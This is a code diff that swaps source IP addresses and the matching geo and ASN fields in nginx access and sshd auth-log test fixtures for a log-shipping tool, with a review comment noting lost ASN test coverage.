 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
diff --git a/filebeat/module/nginx/access/test/test.log-expected.json b/filebeat/module/nginx/access/test/test.log-expected.json
index dfbc56a940a4..b24def8bfc8e 100644
--- a/filebeat/module/nginx/access/test/test.log-expected.json
+++ b/filebeat/module/nginx/access/test/test.log-expected.json
@@ -89,7 +89,7 @@
 "event.dataset": "nginx.access",
 "event.kind": "event",
 "event.module": "nginx",
- "event.original": "10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"",
+ "event.original": "10.0.0.2, 10.0.0.1, 81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"",
 "event.outcome": "success",
 "event.timezone": "-02:00",
 "event.type": [
@@ -105,24 +105,22 @@
 "nginx.access.remote_ip_list": [
 "10.0.0.1",
 "10.0.0.2",
- "85.181.35.98"
+ "81.2.69.143"
 ],
 "related.ip": [
- "85.181.35.98"
+ "81.2.69.143"
 ],
 "service.type": "nginx",
- "source.address": "85.181.35.98",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.city_name": "Berlin",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 52.4473,
- "source.geo.location.lon": 13.4531,
- "source.geo.region_iso_code": "DE-BE",
- "source.geo.region_name": "Land Berlin",
- "source.ip": "85.181.35.98",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "url.original": "/ocelot",
 "url.path": "/ocelot",
 "user_agent.device.name": "Mac",
@@ -141,7 +139,7 @@
 "event.dataset": "nginx.access",
 "event.kind": "event",
 "event.module": "nginx",
- "event.original": "85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"",
+ "event.original": "81.2.69.143 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"",
 "event.outcome": "success",
 "event.timezone": "-02:00",
 "event.type": [
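Review bot: Swapping 85.181.35.98 for 81.2.69.143 removes `source.as.number` and `source.as.organization.name` from the expected event without any replacement, so this fixture no longer asserts that ASN enrichment is applied by the nginx access pipeline; the same fields disappear in the `@@ -153,26 +151,24 @@` and `@@ -203,29 +199,27 @@` hunks. That is presumably because the new test addresses are absent from the ASN test database rather than a pipeline change, but the result is that a regression in the ASN step would now go unnoticed by this module's tests. Consider keeping at least one event whose source address resolves in both the City and ASN test data so the `source.as.*` assertions survive, or state in the commit description where ASN coverage is retained.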
@@ -153,26 +151,24 @@
 "http.response.status_code": 200,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 527,
+ "log.offset": 526,
 "nginx.access.remote_ip_list": [
- "85.181.35.98"
+ "81.2.69.143"
 ],
 "related.ip": [
- "85.181.35.98"
+ "81.2.69.143"
 ],
 "service.type": "nginx",
- "source.address": "85.181.35.98",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.city_name": "Berlin",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 52.4473,
- "source.geo.location.lon": 13.4531,
- "source.geo.region_iso_code": "DE-BE",
- "source.geo.region_name": "Land Berlin",
- "source.ip": "85.181.35.98",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "url.original": "/ocelot",
 "url.path": "/ocelot",
 "user_agent.device.name": "Mac",
@@ -191,7 +187,7 @@
 "event.dataset": "nginx.access",
 "event.kind": "event",
 "event.module": "nginx",
- "event.original": "\"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"",
+ "event.original": "\"10.5.102.222, 175.16.199.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"",
 "event.outcome": "success",
 "event.timezone": "-02:00",
 "event.type": [
@@ -203,29 +199,27 @@
 "http.response.status_code": 200,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 732,
+ "log.offset": 730,
 "nginx.access.remote_ip_list": [
 "10.2.1.185",
 "10.5.102.222",
- "199.96.1.1",
+ "175.16.199.1",
 "204.246.1.1"
 ],
 "related.ip": [
- "199.96.1.1"
+ "175.16.199.1"
 ],
 "service.type": "nginx",
- "source.address": "199.96.1.1",
- "source.as.number": 19065,
- "source.as.organization.name": "Levi, Ray & Shoup, Inc.",
- "source.geo.city_name": "Springfield",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 39.7647,
- "source.geo.location.lon": -89.7379,
- "source.geo.region_iso_code": "US-IL",
- "source.geo.region_name": "Illinois",
- "source.ip": "199.96.1.1",
+ "source.address": "175.16.199.1",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "url.original": "/assets/xxxx?q=100",
 "url.path": "/assets/xxxx",
 "url.query": "q=100",
@@ -241,7 +235,7 @@
 "event.dataset": "nginx.access",
 "event.kind": "event",
 "event.module": "nginx",
- "event.original": "2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"",
+ "event.original": "2a02:cf40:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"",
 "event.outcome": "failure",
 "event.timezone": "-02:00",
 "event.type": [
@@ -257,19 +251,19 @@
 "nginx.access.remote_ip_list": [
 "10.2.2.121",
 "10.225.192.17",
- "2a03:0000:10ff:f00f:0000:0000:0:8000"
+ "2a02:cf40:10ff:f00f:0000:0000:0:8000"
 ],
 "related.ip": [
- "2a03:0000:10ff:f00f:0000:0000:0:8000"
+ "2a02:cf40:10ff:f00f:0000:0000:0:8000"
 ],
 "service.type": "nginx",
- "source.address": "2a03:0000:10ff:f00f:0000:0000:0:8000",
+ "source.address": "2a02:cf40:10ff:f00f:0000:0000:0:8000",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "PT",
- "source.geo.country_name": "Portugal",
- "source.geo.location.lat": 39.5,
- "source.geo.location.lon": -8.0,
- "source.ip": "2a03:0000:10ff:f00f:0000:0000:0:8000",
+ "source.geo.country_iso_code": "NO",
+ "source.geo.country_name": "Norway",
+ "source.geo.location.lat": 62.0,
+ "source.geo.location.lon": 10.0,
+ "source.ip": "2a02:cf40:10ff:f00f:0000:0000:0:8000",
 "url.extension": "html",
 "url.original": "/test.html",
 "url.path": "/test.html",
diff --git a/filebeat/module/system/auth/test/secure-rhel7.log b/filebeat/module/system/auth/test/secure-rhel7.log
index 2b3bfe5fa231..204d11d4322f 100644
--- a/filebeat/module/system/auth/test/secure-rhel7.log
+++ b/filebeat/module/system/auth/test/secure-rhel7.log
@@ -1,580 +1,580 @@
-Feb 22 16:45:20 slave22 sshd[2738]: Failed password for root from 202.109.143.106 port 1786 ssh2
+Feb 22 16:45:20 slave22 sshd[2738]: Failed password for root from 202.196.224.106 port 1786 ssh2
 Feb 22 16:45:20 slave22 sshd[2738]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:22 slave22 sshd[2738]: Failed password for root from 202.109.143.106 port 1786 ssh2
+Feb 22 16:45:22 slave22 sshd[2738]: Failed password for root from 202.196.224.106 port 1786 ssh2
 Feb 22 16:45:23 slave22 sshd[2738]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:26 slave22 sshd[2738]: Failed password for root from 202.109.143.106 port 1786 ssh2
+Feb 22 16:45:26 slave22 sshd[2738]: Failed password for root from 202.196.224.106 port 1786 ssh2
 Feb 22 16:45:26 slave22 sshd[2738]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:45:26 slave22 sshd[2738]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:45:26 slave22 sshd[2738]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:45:26 slave22 sshd[2738]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:45:32 slave22 sshd[2742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:45:32 slave22 sshd[2742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:45:32 slave22 sshd[2742]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:34 slave22 sshd[2742]: Failed password for root from 202.109.143.106 port 3576 ssh2
+Feb 22 16:45:34 slave22 sshd[2742]: Failed password for root from 202.196.224.106 port 3576 ssh2
 Feb 22 16:45:34 slave22 sshd[2742]: pam_succeed_if(sshd:auth): requirement "uid >= 1000"
not met by user "root"
-Feb 22 16:45:36 slave22 sshd[2742]: Failed password for root from 202.109.143.106 port 3576 ssh2
+Feb 22 16:45:36 slave22 sshd[2742]: Failed password for root from 202.196.224.106 port 3576 ssh2
 Feb 22 16:45:37 slave22 sshd[2742]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:39 slave22 sshd[2742]: Failed password for root from 202.109.143.106 port 3576 ssh2
+Feb 22 16:45:39 slave22 sshd[2742]: Failed password for root from 202.196.224.106 port 3576 ssh2
 Feb 22 16:45:39 slave22 sshd[2742]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:41 slave22 sshd[2742]: Failed password for root from 202.109.143.106 port 3576 ssh2
+Feb 22 16:45:41 slave22 sshd[2742]: Failed password for root from 202.196.224.106 port 3576 ssh2
 Feb 22 16:45:41 slave22 sshd[2742]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:44 slave22 sshd[2742]: Failed password for root from 202.109.143.106 port 3576 ssh2
+Feb 22 16:45:44 slave22 sshd[2742]: Failed password for root from 202.196.224.106 port 3576 ssh2
 Feb 22 16:45:44 slave22 sshd[2742]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:45:44 slave22 sshd[2742]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:45:44 slave22 sshd[2742]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:45:44 slave22 sshd[2742]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:45:54 slave22 sshd[2754]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:45:54 slave22 sshd[2754]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:45:54 slave22 sshd[2754]: pam_succeed_if(sshd:auth): requirement "uid >=
1000" not met by user "root"
-Feb 22 16:45:56 slave22 sshd[2758]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 16:45:56 slave22 sshd[2758]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 16:45:56 slave22 sshd[2758]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:57 slave22 sshd[2754]: Failed password for root from 202.109.143.106 port 1996 ssh2
+Feb 22 16:45:57 slave22 sshd[2754]: Failed password for root from 202.196.224.106 port 1996 ssh2
 Feb 22 16:45:57 slave22 sshd[2754]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:57 slave22 sshd[2758]: Failed password for root from 116.31.116.27 port 26714 ssh2
+Feb 22 16:45:57 slave22 sshd[2758]: Failed password for root from 216.160.83.58 port 26714 ssh2
 Feb 22 16:45:58 slave22 sshd[2758]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:45:59 slave22 sshd[2754]: Failed password for root from 202.109.143.106 port 1996 ssh2
+Feb 22 16:45:59 slave22 sshd[2754]: Failed password for root from 202.196.224.106 port 1996 ssh2
 Feb 22 16:45:59 slave22 sshd[2754]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:00 slave22 sshd[2758]: Failed password for root from 116.31.116.27 port 26714 ssh2
+Feb 22 16:46:00 slave22 sshd[2758]: Failed password for root from 216.160.83.58 port 26714 ssh2
 Feb 22 16:46:00 slave22 sshd[2758]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:01 slave22 sshd[2754]: Failed password for root from 202.109.143.106 port 1996 ssh2
+Feb 22 16:46:01 slave22 sshd[2754]: Failed password for root from 202.196.224.106 port 1996 ssh2
 Feb 22 16:46:02 slave22 sshd[2754]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:03 slave22
sshd[2758]: Failed password for root from 116.31.116.27 port 26714 ssh2
-Feb 22 16:46:03 slave22 sshd[2758]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 16:46:03 slave22 sshd[2758]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
-Feb 22 16:46:04 slave22 sshd[2754]: Failed password for root from 202.109.143.106 port 1996 ssh2
+Feb 22 16:46:03 slave22 sshd[2758]: Failed password for root from 216.160.83.58 port 26714 ssh2
+Feb 22 16:46:03 slave22 sshd[2758]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 16:46:03 slave22 sshd[2758]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
+Feb 22 16:46:04 slave22 sshd[2754]: Failed password for root from 202.196.224.106 port 1996 ssh2
 Feb 22 16:46:04 slave22 sshd[2754]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:06 slave22 sshd[2754]: Failed password for root from 202.109.143.106 port 1996 ssh2
+Feb 22 16:46:06 slave22 sshd[2754]: Failed password for root from 202.196.224.106 port 1996 ssh2
 Feb 22 16:46:06 slave22 sshd[2754]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:46:06 slave22 sshd[2754]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:46:06 slave22 sshd[2754]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:46:06 slave22 sshd[2754]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:46:16 slave22 sshd[2762]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:46:16 slave22 sshd[2762]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:46:16 slave22 sshd[2762]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not
met by user "root"
-Feb 22 16:46:18 slave22 sshd[2762]: Failed password for root from 202.109.143.106 port 1605 ssh2
+Feb 22 16:46:18 slave22 sshd[2762]: Failed password for root from 202.196.224.106 port 1605 ssh2
 Feb 22 16:46:18 slave22 sshd[2762]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:21 slave22 sshd[2762]: Failed password for root from 202.109.143.106 port 1605 ssh2
+Feb 22 16:46:21 slave22 sshd[2762]: Failed password for root from 202.196.224.106 port 1605 ssh2
 Feb 22 16:46:21 slave22 sshd[2762]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:23 slave22 sshd[2762]: Failed password for root from 202.109.143.106 port 1605 ssh2
+Feb 22 16:46:23 slave22 sshd[2762]: Failed password for root from 202.196.224.106 port 1605 ssh2
 Feb 22 16:46:24 slave22 sshd[2762]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:26 slave22 sshd[2762]: Failed password for root from 202.109.143.106 port 1605 ssh2
+Feb 22 16:46:26 slave22 sshd[2762]: Failed password for root from 202.196.224.106 port 1605 ssh2
 Feb 22 16:46:26 slave22 sshd[2762]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:28 slave22 sshd[2762]: Failed password for root from 202.109.143.106 port 1605 ssh2
+Feb 22 16:46:28 slave22 sshd[2762]: Failed password for root from 202.196.224.106 port 1605 ssh2
 Feb 22 16:46:29 slave22 sshd[2762]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:46:29 slave22 sshd[2762]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:46:29 slave22 sshd[2762]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:46:29 slave22 sshd[2762]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:46:41 slave22 sshd[2766]: pam_unix(sshd:auth): authentication failure;
logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:46:41 slave22 sshd[2766]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:46:41 slave22 sshd[2766]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:44 slave22 sshd[2766]: Failed password for root from 202.109.143.106 port 1166 ssh2
+Feb 22 16:46:44 slave22 sshd[2766]: Failed password for root from 202.196.224.106 port 1166 ssh2
 Feb 22 16:46:44 slave22 sshd[2766]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:46 slave22 sshd[2766]: Failed password for root from 202.109.143.106 port 1166 ssh2
+Feb 22 16:46:46 slave22 sshd[2766]: Failed password for root from 202.196.224.106 port 1166 ssh2
 Feb 22 16:46:46 slave22 sshd[2766]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:48 slave22 sshd[2766]: Failed password for root from 202.109.143.106 port 1166 ssh2
+Feb 22 16:46:48 slave22 sshd[2766]: Failed password for root from 202.196.224.106 port 1166 ssh2
 Feb 22 16:46:48 slave22 sshd[2766]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:51 slave22 sshd[2766]: Failed password for root from 202.109.143.106 port 1166 ssh2
+Feb 22 16:46:51 slave22 sshd[2766]: Failed password for root from 202.196.224.106 port 1166 ssh2
 Feb 22 16:46:51 slave22 sshd[2766]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:53 slave22 sshd[2766]: Failed password for root from 202.109.143.106 port 1166 ssh2
+Feb 22 16:46:53 slave22 sshd[2766]: Failed password for root from 202.196.224.106 port 1166 ssh2
 Feb 22 16:46:53 slave22 sshd[2766]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:46:53 slave22 sshd[2766]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106
user=root
+Feb 22 16:46:53 slave22 sshd[2766]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:46:53 slave22 sshd[2766]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:46:57 slave22 sshd[2778]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 16:46:57 slave22 sshd[2778]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 16:46:57 slave22 sshd[2778]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:46:59 slave22 sshd[2778]: Failed password for root from 116.31.116.27 port 13996 ssh2
+Feb 22 16:46:59 slave22 sshd[2778]: Failed password for root from 216.160.83.58 port 13996 ssh2
 Feb 22 16:46:59 slave22 sshd[2778]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:02 slave22 sshd[2778]: Failed password for root from 116.31.116.27 port 13996 ssh2
+Feb 22 16:47:02 slave22 sshd[2778]: Failed password for root from 216.160.83.58 port 13996 ssh2
 Feb 22 16:47:03 slave22 sshd[2778]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:05 slave22 sshd[2778]: Failed password for root from 116.31.116.27 port 13996 ssh2
-Feb 22 16:47:05 slave22 sshd[2778]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 16:47:05 slave22 sshd[2778]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
-Feb 22 16:47:32 slave22 sshd[2785]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:47:05 slave22 sshd[2778]: Failed password for root from 216.160.83.58 port 13996 ssh2
+Feb 22 16:47:05 slave22 sshd[2778]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 16:47:05 slave22 sshd[2778]: PAM 2 more authentication failures;
logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
+Feb 22 16:47:32 slave22 sshd[2785]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:47:32 slave22 sshd[2785]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:34 slave22 sshd[2785]: Failed password for root from 202.109.143.106 port 3300 ssh2
+Feb 22 16:47:34 slave22 sshd[2785]: Failed password for root from 202.196.224.106 port 3300 ssh2
 Feb 22 16:47:35 slave22 sshd[2785]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:36 slave22 sshd[2785]: Failed password for root from 202.109.143.106 port 3300 ssh2
+Feb 22 16:47:36 slave22 sshd[2785]: Failed password for root from 202.196.224.106 port 3300 ssh2
 Feb 22 16:47:37 slave22 sshd[2785]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:38 slave22 sshd[2785]: Failed password for root from 202.109.143.106 port 3300 ssh2
+Feb 22 16:47:38 slave22 sshd[2785]: Failed password for root from 202.196.224.106 port 3300 ssh2
 Feb 22 16:47:39 slave22 sshd[2785]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:41 slave22 sshd[2785]: Failed password for root from 202.109.143.106 port 3300 ssh2
+Feb 22 16:47:41 slave22 sshd[2785]: Failed password for root from 202.196.224.106 port 3300 ssh2
 Feb 22 16:47:42 slave22 sshd[2785]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:44 slave22 sshd[2785]: Failed password for root from 202.109.143.106 port 3300 ssh2
+Feb 22 16:47:44 slave22 sshd[2785]: Failed password for root from 202.196.224.106 port 3300 ssh2
 Feb 22 16:47:44 slave22 sshd[2785]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:47:44 slave22 sshd[2785]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106
user=root
+Feb 22 16:47:44 slave22 sshd[2785]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:47:44 slave22 sshd[2785]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:47:52 slave22 sshd[2797]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:47:52 slave22 sshd[2797]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:47:52 slave22 sshd[2797]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:54 slave22 sshd[2797]: Failed password for root from 202.109.143.106 port 1347 ssh2
+Feb 22 16:47:54 slave22 sshd[2797]: Failed password for root from 202.196.224.106 port 1347 ssh2
 Feb 22 16:47:54 slave22 sshd[2797]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:56 slave22 sshd[2797]: Failed password for root from 202.109.143.106 port 1347 ssh2
+Feb 22 16:47:56 slave22 sshd[2797]: Failed password for root from 202.196.224.106 port 1347 ssh2
 Feb 22 16:47:56 slave22 sshd[2797]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:58 slave22 sshd[2801]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
+Feb 22 16:47:58 slave22 sshd[2801]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
 Feb 22 16:47:58 slave22 sshd[2801]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:47:59 slave22 sshd[2797]: Failed password for root from 202.109.143.106 port 1347 ssh2
+Feb 22 16:47:59 slave22 sshd[2797]: Failed password for root from 202.196.224.106 port 1347 ssh2
 Feb 22 16:47:59 slave22 sshd[2797]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:48:00
slave22 sshd[2801]: Failed password for root from 116.31.116.27 port 50793 ssh2
+Feb 22 16:48:00 slave22 sshd[2801]: Failed password for root from 216.160.83.58 port 50793 ssh2
 Feb 22 16:48:00 slave22 sshd[2801]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:48:01 slave22 sshd[2797]: Failed password for root from 202.109.143.106 port 1347 ssh2
+Feb 22 16:48:01 slave22 sshd[2797]: Failed password for root from 202.196.224.106 port 1347 ssh2
 Feb 22 16:48:01 slave22 sshd[2797]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:48:02 slave22 sshd[2801]: Failed password for root from 116.31.116.27 port 50793 ssh2
+Feb 22 16:48:02 slave22 sshd[2801]: Failed password for root from 216.160.83.58 port 50793 ssh2
 Feb 22 16:48:03 slave22 sshd[2801]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:48:03 slave22 sshd[2797]: Failed password for root from 202.109.143.106 port 1347 ssh2
+Feb 22 16:48:03 slave22 sshd[2797]: Failed password for root from 202.196.224.106 port 1347 ssh2
 Feb 22 16:48:04 slave22 sshd[2805]: Accepted publickey for drewr from 69.245.39.97 port 34202 ssh2: RSA 01:67:32:d9:b3:20:5d:2d:5f:b4:35:c5:a5:8b:0a:5e
 Feb 22 16:48:04 slave22 sshd[2805]: pam_unix(sshd:session): session opened for user drewr by (uid=0)
 Feb 22 16:48:04 slave22 sshd[2797]: fatal: Read from socket failed: Connection reset by peer [preauth]
